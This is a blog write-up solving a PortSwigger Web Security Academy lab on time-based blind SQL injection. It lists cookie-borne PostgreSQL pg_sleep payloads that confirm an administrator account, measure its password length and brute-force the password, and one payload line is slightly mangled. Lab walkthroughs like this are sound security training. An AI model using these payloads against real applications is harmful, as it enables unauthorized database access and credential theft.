Skip to content

chojnowski.it

Port Swigger Blind SQL injection with time delays

Port Swigger Blind SQL injection with time delays

Solution¶

Open website: https://0a2d00d604e38184819c934d006d0045.web-security-academy.net/¶

https://0a2d00d604e38184819c934d006d0045.web-security-academy.net/

Verify that the application need 10 sec to respond¶

Payload: '%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(2)+END--
--
Cookie: TrackingId=0u5Bwd2dts9ueT54'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(2)+END--; session=nAQzesQBk4Eiqsj71NyivZVPdHmCIc9x

Verify that there is a user called administrator¶

Payload: '%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(2)+END+FROM+users--
--
Cookie: TrackingId=0u5Bwd2dts9ueT54ayload: '%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(2)+END+FROM+users--; session=nAQzesQBk4Eiqsj71NyivZVPdHmCIc9x

Verify how long password is¶

Password long: 20 chars
---
Payload: '%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(2)+ELSE+pg_sleep(0)+END+FROM+users--
--
Cookie: TrackingId=PVZiVXQ7dnJ1kfW6'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(2)+ELSE+pg_sleep(0)+END+FROM+users--;

Bruteforce password¶

Password: b8z7486thtay10xun84g

User: administrator
Password: b8z7486thtay10xun84g